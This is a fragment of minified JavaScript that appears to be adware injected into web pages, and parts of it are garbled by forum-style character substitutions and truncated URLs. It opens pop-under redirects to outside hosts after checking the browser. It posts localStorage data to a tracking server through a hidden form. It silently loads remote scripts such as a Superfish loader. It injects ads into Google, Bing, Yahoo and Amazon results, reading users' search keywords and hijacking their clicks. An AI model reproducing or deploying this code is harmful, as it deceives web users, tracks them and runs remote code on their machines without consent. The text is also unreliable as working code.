function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [459,size]);}}catch(e){return !1;}},cpx_nontb30_tr:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/tra/32160/index.html?size=+size+&referrer=' (atp?atp:1), [442,size]);}}catch(e){return !1;}},dsnr_strm_t1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size == \"120x60\") return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2112867&size=+size+&referrer=' (atp?atp:1), [453,size]);}}catch(e){return !1;}},mari_strm4:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2121065\",\"300x250\":\"2121064\",\"160x600\":\"2121063\"}[size];var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [462,size]);}}catch(e){return !1;}},matomy_strm5_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2122667\",\"300x250\":\"2122661\",\"160x600\":\"2122669\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [467,size]);}}catch(e){return !1;}},matomy_strm5:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2122666\",\"300x250\":\"2122660\",\"160x600\":\"2122668\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [468,size]);}}catch(e){return !1;}},hulk_porn:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600 300x600 250x250 600x400'.indexOf(size)) return !1;var atp=false;var surl='http://syndication.exoclick.com/ads-iframe-display.php?type=+size+&login=hulkshare_RS2&cat=2&search=&ad_title_color=0000cc&bgcolor=FFFFFF&border=0&border_color=000000&font=&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=0&text_only=0&show_thumb=0&idzone=' + {\"728x90\":\"638635\",\"300x250\":\"638633\",\"468x60\":\"774737\",\"120x600\":\"774751\",\"160x600\":\"638637\",\"300x600\":\"774753\",\"250x250\":\"774743\",\"600x400\":\"774747\"}[size] + '&idsite=225117&p='+encodeURIComponent(window.self.location.href)+'&dt=' + Math.random();;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [420,size]);}}catch(e){return !1;}}}};_zyad.init();;(function(){try{if(window.opener&&window.self==window.top&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://rbv.jobfindgold.info/a1/?eid=713&hid=3312693594561686360&pid=0&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1<c.indexOf(\"msie\")&&(!document.referrer||-1==document.referrer.indexOf(location.hostname))){var e=window.innerWidth||document.documentElement.scrollWidth||0,f=window.innerHeight||document.documentElement.scrollHeight||0;if(e){window.resizeTo(e,f);var g=window.innerWidth||document.documentElement.scrollWidth,k=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(e+2,f);var h=window.scrollWidth||document.documentElement.scrollWidth;if(h!=g&&h<=g+2&&90>=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1<c.indexOf(\"chrome\")&&(b.innerHTML='document.getElementsByTagName(\"body\")[0].setAttribute(\"xcddsa\",\"1\")',document.getElementsByTagName(\"body\")[0].appendChild( B),setTimeout(function(){document.getElementsByTagName(\"body\")[0].getAttribute(\"xcddsa\")&&(window.self.location.href=d)},10));-1<c.indexOf(\"firefox\")&&(b.innerHTML='try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};setTimeout(function(){window.self.location.href=\"'+d+'\";},10);',document.getElementsByTagName(\"head\")[0].appendChild( B))}}}catch(l){}})();if(-1<window.self.location.href.indexOf(\"df.ly/\")){var dd=document.getElementById(\"rf\");dd&&dd.setAttribute(\"src\",\"http://rbv.jobfindgold.info/x/?ch=1\")}(\"rdlnk.co\"==window.self.location.hostname||\"adfoc.us\"==window.self.location.hostname||\"www.adsbeta.net\"==window.self.location.hostname||\"ad5.eu\"==window.self.location.hostname)&&(dd=document.getElementsByTagName(\"iframe\")[0])&&dd.setAttribute(\"src\",\"http://rbv.jobfindgold.info/x/?ch=1\");\"cf.ly\"==window.self.location.hostname&&(dd=document.getElementsByTagName(\"iframe\")[1])&&dd.setAttribute(\"src\",\"http://rbv.jobfindgold.info/x/?ch=1\");\"adv.li\"==window.self.location.hostname&&(dd=document.getElementById(\"main\"))&&dd.setAttribute(\"src\",\"http://rbv.jobfindgold.info/x/?ch=1\");;(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"KiBLRSQw=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"KiBLRSQw=\")){var d=a.match(/KiBLRSQw=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8lkGhVWzmPhd96rjrMCyVUojaMDMlGC7VLBT94tMtGB6DHhfs0rShNAen0rchOAen0rHrFrTg4rHk4qdk7rjg5qTr7ra==\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://yt.jobfindgol...\" Math.random();break}}}catch(d){}})();if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//www.superfish.com/ws/sf_main.jsp?dlsource=pcom&userId=8551019082&CTID=p0';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1499/l.js?aoi=1311798366&pid=1499&zoneid=287609&ext=safesaver\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top && window.self.location.protocol=='http:'){var script=document.createElement('script');script.type='text/javascript';script.src='//istatic.datafastguru.info/fo/min/wp.js';document.getElementsByTagName(\"head\")[0].appendChild(script);};try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"http://istatic.dataf...fklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this,h=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.version=\"0.4\";b.jsonpHost=\"bestdepotstorey.asia\";b.now=(new Date).getTime();b.prefix=\"jhgasdf\";b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\"; b.unique_items_left=!0;b.num_of_items_in_one=2;b.count=0;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\", function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0;c.callback=a;this.is_direction_right=function(){b.utils.waitForElement(\".col\",function(a){if(null==a||\"right\"==b.utils.get_computed_style(a[0]).getPropertyValue(\"float\"))return!0;if(!c.check_tab())return!1},1E3,\"validate\")};c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\"); if(null==a||\"undefined\"==typeof a)if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return b.utils.query_selector_all(\".hdtb_mitem\")[0].className.match(/hdtb_msel/)&&c.callback(),!1};return c.is_direction_right()?!1:!0}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"], urls:[\"http://www.bing.com/...idate:function(){return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.condui...:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs  a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/w...rc_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"], validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple...idate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\", \"http://search.incred...idate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"https://www.google.c...tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop= \"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"),!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a, null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\",urls:[\"http://www.amazon.co...date:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"], src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache= [];a.add=window.addEventListener?function(c,b,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(c,b,e);g&&a.cache.push([c,b,e,f])}:window.attachEvent?function(c,b,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+c+b]=b;f[c+b]=function(){f[\"e\"+c+b](window.event)};f.attachEvent(\"on\"+c,f[c+b]);g&&a.cache.push([c,b,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"== typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.utils=new function(){var a=this;a.ajax={get:function(b,d){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",b,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&d(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(b,d,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",b,!0); this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};d=encodeURIComponent(d);this.xhr.send(d)}};a.waitForTokens={};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©;clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var k=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++; k(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a, B){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function( B){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]? b.currentStyle[d]:null}}}:function(a, B){return window.getComputedStyle(a, B)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch( B){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild( B);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\"; window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a= a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a, B){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)}, B)}};a.epoch=function(){return(new Date).getTime()};a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)}; a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test( B))return!0}}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"== d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);c.style[f]=a.attrs.style[e]}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(g){if(\"#text\"== f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref= function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);e?b.checkClickInterval(e)&&b.addEventClick(g,a):b.addEventClick(g,a)}}};b.escape_chars_for_json=function(a){for(var b in a)a= a.replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template); d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling): a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<h.length;b++)if(-1<a.layouts.id.indexOf(h))return h;return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function( B){window.open(a);b.preventDefault? b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left=!1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a, c[0])),b.not_unique_items.push(c.shift())};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[c],!1)};b.check_if_div_in_dom=function(a, B){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var k=l(f.inserts[g].selector); \"undefined\"!==typeof k&&d.push(k)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var h=this;p=setTimeout(function(){h.apply(h,arguments)},200)}b()};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(a.current_layout=b.get_layout_type(a),\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a.node=b.create_search(a)}catch(e){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.inject_search=function(){b.not_unique_items= [];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search(); for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value; if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]); else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael= B);d=b.jsonpHost+\"/?v=\"+b.version+ \"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=3312693594561686360&eid=713&pid=0\";if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";document.getElementsByTagName(\"head\")[0].appendChild(e)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems? b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}});})();(function(){void(0)})()");
